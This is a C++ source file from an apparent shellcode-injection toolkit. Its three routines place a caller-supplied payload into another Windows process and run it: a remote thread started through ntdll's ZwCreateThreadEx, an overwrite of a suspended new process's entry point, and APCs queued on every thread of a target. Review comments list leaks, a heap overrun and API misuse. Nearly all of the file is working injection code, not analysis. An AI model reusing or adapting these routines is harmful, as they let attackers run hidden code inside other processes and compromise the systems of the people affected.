#include "CodeInject.h"
//#include "CodeInject.h"

// CodeInject.cpp -- three routines that place a caller-supplied byte buffer into another
// process and arrange for it to run, plus one thread-enumeration helper:
//   * ZwCreateThreadExCodeInject : allocate + write into a running process, start a thread there
//   * CreateProcessCodeInject    : spawn a target suspended, overwrite memory at the address in
//                                  its initial thread's Rax/Eax, resume
//   * QueueUserAPCCodeInject     : allocate + write into a running process, queue an APC on each
//                                  of its threads
// CodeBuffer (fields pBuffer, BufferSize) and DEBUG are not declared in this file; presumably
// they come from CodeInject.h -- verify there. All routines log with printf and return BOOL.
// Recurring review findings (detailed per function): handles and heap buffers leak on several
// error paths, logging is gated on DEBUG in one routine and unconditional in the others, and the
// thread-enumeration helper fills a fixed-size array with no bounds check.

// Allocate an RWX region in process dwPid, copy Buffer into it and start a thread at that
// address through the ntdll export ZwCreateThreadEx (no public header; prototype hand-declared
// below).
// dwPid  : target process id; opened with PROCESS_ALL_ACCESS.
// Buffer : bytes to copy (Buffer.pBuffer / Buffer.BufferSize). Passed by value, which copies only
//          the pointer/size pair, not the bytes they describe.
// Returns TRUE once the remote thread has been created -- the 1 s wait near the end is
// best-effort and its result is discarded -- or FALSE on the first failing API call, which is
// logged only when DEBUG is set. The remote region is never released by this function.
BOOL CodeInject::ZwCreateThreadExCodeInject(DWORD dwPid, CodeBuffer Buffer)
{
    HANDLE hProcess = NULL;
    HANDLE hRemoteThread = NULL;
    PVOID pRemoteBuffer = NULL;
    BOOL bFlag = FALSE;
    //EnableDebugPriv(SE_DEBUG_NAME);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    // NULL, not INVALID_HANDLE_VALUE, is the failure value for OpenProcess: which sentinel to
    // test against depends on the individual API (a long-standing Win32 inconsistency).
    if (hProcess == NULL)
    {
        if (DEBUG)
        {
            printf("OpenProcess Fail:%x\n", GetLastError());
        }
        return FALSE;
    }
    // One committed region that is writable and executable at the same time.
    pRemoteBuffer = VirtualAllocEx(hProcess, NULL, Buffer.BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (!pRemoteBuffer)
    {
        if (DEBUG)
        {
            printf("VirtualAllocEx Fail:%x\n", GetLastError());
        }
        CloseHandle(hProcess);
        return FALSE;
    }
    // lpNumberOfBytesWritten is NULL, so a short write is not detectable here (contrast
    // QueueUserAPCCodeInject, which compares the byte count instead of the BOOL).
    bFlag = WriteProcessMemory(hProcess, pRemoteBuffer, Buffer.pBuffer, Buffer.BufferSize, NULL);
    if (!bFlag)
    {
        if (DEBUG)
        {
            printf("WriteProcessMemory Fail:%x\n", GetLastError());
        }
        CloseHandle(hProcess);
        return FALSE;
    }
    else if(DEBUG)
    {
        printf("[*] ShellCode 加载地址 = 0x%p\n", pRemoteBuffer);
    }
    HMODULE hNtdll = NULL;
    // ntdll.dll is already mapped into every Win32 process, so GetModuleHandleA (no reference
    // count taken) suffices; the LoadLibraryA variant is kept commented out by the author.
    hNtdll = GetModuleHandleA("ntdll.dll");
    //hNtdll = LoadLibraryA("ntdll.dll");
    if (!hNtdll)
    {
        if (DEBUG)
        {
            printf("GetNtdllModuleHandleA Fail:%x\n", GetLastError());
        }
        CloseHandle(hProcess);
        return FALSE;
    }
    // Hand-written prototype for the undocumented ZwCreateThreadEx. The 64-bit and 32-bit
    // declarations differ in the flag/size parameter types; names such as dw1, dw2 and pUnkown
    // are the author's placeholders, not documented semantics. The return type is declared as
    // DWORD although the call site stores it in an NTSTATUS.
#ifdef _WIN64
    typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle,
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        ULONG CreateThreadFlags,
        SIZE_T ZeroBits,
        SIZE_T StackSize,
        SIZE_T MaximumStackSize,
        LPVOID pUnkown);
#else
    typedef DWORD(WINAPI* typedef_ZwCreateThreadEx)(
        PHANDLE ThreadHandle, // thread handle (out)
        ACCESS_MASK DesiredAccess,
        LPVOID ObjectAttributes,
        HANDLE ProcessHandle, // process handle
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID lpParameter,
        BOOL CreateSuspended,
        DWORD dwStackSize,
        DWORD dw1,
        DWORD dw2,
        LPVOID pUnkown);
#endif
    typedef_ZwCreateThreadEx ZwCreateThreadEx = NULL;
    ZwCreateThreadEx = (typedef_ZwCreateThreadEx)GetProcAddress(hNtdll, "ZwCreateThreadEx");
    if (ZwCreateThreadEx == NULL)
    {
        if (DEBUG)
        {
            printf("GetZwCreateThreadExProcAddress Fail:%x\n", GetLastError());
        }
        CloseHandle(hProcess);
        return FALSE;
    }
    // Start address is the remote allocation itself, with no argument. DesiredAccess is passed
    // as PROCESS_ALL_ACCESS although the object being created is a thread (THREAD_ALL_ACCESS is
    // the matching mask) -- NOTE(review): confirm this is intended.
    NTSTATUS ntStatus = ZwCreateThreadEx(&hRemoteThread, PROCESS_ALL_ACCESS, NULL, hProcess, (LPTHREAD_START_ROUTINE)pRemoteBuffer, NULL, FALSE, 0, 0, 0, NULL);
    // A negative NTSTATUS is a failure; this is the same test NT_SUCCESS() performs.
    if (ntStatus < 0)
    {
        if (DEBUG)
        {
            printf("ZwCreateThreadEx Fail:%x\n", ntStatus);
        }
        CloseHandle(hProcess);
        return FALSE;
    }
    // Wait at most 1000 ms for the thread; the WAIT_OBJECT_0 / WAIT_TIMEOUT result is dropped,
    // so the TRUE below means "thread created", not "code ran to completion".
    WaitForSingleObject(hRemoteThread, 1000);
    CloseHandle(hRemoteThread);
    CloseHandle(hProcess);
    return TRUE;
}

// Launch pszTarget with CREATE_SUSPENDED, read the initial thread's context, overwrite the
// memory at the address held in Rax (x64) / Eax (x86) with Buffer, then resume the thread.
// The author's comment treats that register as holding the process entry point; that is
// undocumented behaviour of the initial thread context -- NOTE(review): confirm for the target
// architecture and Windows versions.
// pszTarget : path of the executable to spawn (passed as lpApplicationName; no command line).
// Buffer    : bytes to write (Buffer.pBuffer / Buffer.BufferSize). No check is made that
//             BufferSize fits within the mapping at the target address.
// Returns TRUE on success. Failure paths return 0 (the same value as FALSE) after
// TerminateProcess, except the CreateProcessW failure, where there is no process to tear down.
// Leaks: ProcessInfo.hProcess and ProcessInfo.hThread are never closed on any path. Logging is
// unconditional here, unlike ZwCreateThreadExCodeInject which gates it on DEBUG.
BOOL CodeInject::CreateProcessCodeInject(const WCHAR* pszTarget,CodeBuffer Buffer)
{
    STARTUPINFO start = { 0 };
    PROCESS_INFORMATION ProcessInfo = { 0 };
    start.cb = sizeof(STARTUPINFO);
    // Redundant: ProcessInfo was already zero-initialised by the aggregate initialiser above.
    memset(&ProcessInfo, 0, sizeof(PROCESS_INFORMATION));
    if (!CreateProcessW(pszTarget,NULL,NULL,NULL,FALSE,CREATE_SUSPENDED,NULL,NULL,&start,&ProcessInfo))
    {
        printf("CreateProcess Fail:%x\n", GetLastError());
        return 0;
    }
    // Read the suspended initial thread's context to obtain the address the author refers to as
    // the process entry point.
    CONTEXT context;
    context.ContextFlags = CONTEXT_ALL;
    if (!GetThreadContext(ProcessInfo.hThread, &context))
    {
        printf("Get ThreadContext Fail:%x\n", GetLastError());
        TerminateProcess(ProcessInfo.hProcess, 0);
        return 0;
    }
    BOOL bFlag = FALSE;
    // Overwrite whatever is mapped at Rax/Eax with the payload; lpNumberOfBytesWritten is 0, so
    // only the BOOL result is available to judge success.
#ifdef _WIN64
    bFlag = WriteProcessMemory(ProcessInfo.hProcess, (LPVOID)context.Rax, Buffer.pBuffer, Buffer.BufferSize, 0);
#else
    bFlag = WriteProcessMemory(ProcessInfo.hProcess, (LPVOID)context.Eax, Buffer.pBuffer, Buffer.BufferSize, 0);
#endif
    // write shellcode
    if (!bFlag)
    {
        printf("Write Shellcode faild (%d). \n", GetLastError());
        TerminateProcess(ProcessInfo.hProcess, 0);
        return 0;
    }
    // resume the thread
    if (ResumeThread(ProcessInfo.hThread) == (DWORD)-1)
    {
        printf("ResumeThread Fail:%x\n", GetLastError());
        TerminateProcess(ProcessInfo.hProcess, 0);
        return 0;
    }
    return TRUE;
}

// Collect the thread ids owned by dwProcessId from a system-wide Toolhelp thread snapshot.
// On success *ppThreadId points to a new[]-allocated DWORD array (the caller must delete[] it,
// as QueueUserAPCCodeInject does) and *pdwThreadIdLength is the number of entries filled in.
// This is a free function, unlike its only caller below, which is a CodeInject member.
// Defects visible in this body:
//   * The array is a fixed dwBufferLength (1000) entries and the fill loop never compares
//     dwThreadIdLength against it, so a process with more than 1000 threads overruns the heap
//     buffer.
//   * hSnapshot is never closed -- there is no CloseHandle on any path.
//   * Plain `new` throws std::bad_alloc rather than returning NULL, so the NULL check after it
//     is dead code.
//   * CreateToolhelp32Snapshot reports failure as INVALID_HANDLE_VALUE, not NULL, so the NULL
//     test never fires; Thread32First then fails and an empty list is returned as success.
BOOL GetAllThreadIdByProcessId(DWORD dwProcessId, DWORD** ppThreadId, DWORD* pdwThreadIdLength)
{
    DWORD* pThreadId = NULL;
    DWORD dwThreadIdLength = 0;
    DWORD dwBufferLength = 1000;
    THREADENTRY32 te32 = { 0 };
    HANDLE hSnapshot = NULL;
    BOOL bRet = TRUE;
    do
    {
        // allocate the result array
        pThreadId = new DWORD[dwBufferLength];
        if (NULL == pThreadId)
        {
            printf("new");
            bRet = FALSE;
            break;
        }
        ::RtlZeroMemory(pThreadId, (dwBufferLength * sizeof(DWORD)));
        // take a snapshot of every thread in the system; filtered by owner pid below
        ::RtlZeroMemory(&te32, sizeof(te32));
        te32.dwSize = sizeof(te32);
        hSnapshot = ::CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
        if (NULL == hSnapshot)
        {
            printf("CreateToolhelp32Snapshot");
            bRet = FALSE;
            break;
        }
        // first snapshot entry
        bRet = ::Thread32First(hSnapshot, &te32);
        while (bRet)
        {
            // keep the ids owned by the requested process
            if (te32.th32OwnerProcessID == dwProcessId)
            {
                // no bounds check against dwBufferLength
                pThreadId[dwThreadIdLength] = te32.th32ThreadID;
                dwThreadIdLength++;
            }
            // next snapshot entry
            bRet = ::Thread32Next(hSnapshot, &te32);
        }
        // hand the array to the caller; bRet is FALSE here because the loop ended, so reset it
        *ppThreadId = pThreadId;
        *pdwThreadIdLength = dwThreadIdLength;
        bRet = TRUE;
    } while (FALSE);
    // only the early-break paths arrive here with bRet == FALSE
    if (FALSE == bRet)
    {
        if (pThreadId)
        {
            delete[]pThreadId;
            pThreadId = NULL;
        }
    }
    return bRet;
}

// Allocate an RWX region in process dwPid, copy Buffer into it and queue it as a user-mode APC
// (routine and argument are both the region address) on every thread of that process that
// can be opened.
// dwPid  : target process id; opened with PROCESS_ALL_ACCESS.
// Buffer : bytes to copy (Buffer.pBuffer / Buffer.BufferSize).
// Returns TRUE after the loop regardless of how many threads were opened or whether any APC
// is delivered (a user APC runs only when its thread enters an alertable wait); QueueUserAPC
// failures are not checked.
// Leaks on error paths: pThreadId after an OpenProcess failure; hProcess and pThreadId after a
// VirtualAllocEx failure or a short WriteProcessMemory. The remote region is never freed on any
// path. Logging is unconditional and prints only the API name, without GetLastError().
BOOL CodeInject::QueueUserAPCCodeInject(DWORD dwPid, CodeBuffer Buffer)
{
    BOOL bRet = FALSE;
    DWORD* pThreadId = NULL;
    DWORD dwThreadIdLength = 0;
    HANDLE hProcess = NULL, hThread = NULL;
    PVOID pRemoteBuffer = NULL;
    SIZE_T dwRet = 0;
    DWORD i = 0;
    bRet = GetAllThreadIdByProcessId(dwPid, &pThreadId, &dwThreadIdLength);
    if (FALSE == bRet)
    {
        return FALSE;
    }
    hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, FALSE, dwPid);
    if (NULL == hProcess)
    {
        printf("OpenProcess"); // pThreadId leaks here
        return FALSE;
    }
    // allocate memory in the target process
    pRemoteBuffer = ::VirtualAllocEx(hProcess, NULL, Buffer.BufferSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (pRemoteBuffer == NULL)
    {
        printf("VirtualAllocEx"); // hProcess and pThreadId leak here
        return FALSE;
    }
    // write the payload into the allocated region; success is judged by the byte count in
    // dwRet alone, the BOOL result is discarded
    WriteProcessMemory(hProcess, pRemoteBuffer, Buffer.pBuffer, Buffer.BufferSize, &dwRet);
    if (dwRet != Buffer.BufferSize)
    {
        printf("WriteProcessMemory"); // hProcess and pThreadId leak here
        return FALSE;
    }
    // walk the threads and queue an APC on each one that can be opened
    for (i = 0; i < dwThreadIdLength; i++)
    {
        // open the thread
        hThread = ::OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);
        if (hThread)
        {
            // queue the APC; the return value is not checked
            ::QueueUserAPC((PAPCFUNC)pRemoteBuffer, hThread, (ULONG_PTR)pRemoteBuffer);
            // close the thread handle
            ::CloseHandle(hThread);
            hThread = NULL;
        }
    }
    if (hProcess)
    {
        ::CloseHandle(hProcess);
        hProcess = NULL;
    }
    if (pThreadId)
    {
        delete[]pThreadId;
        pThreadId = NULL;
    }
    return TRUE;
}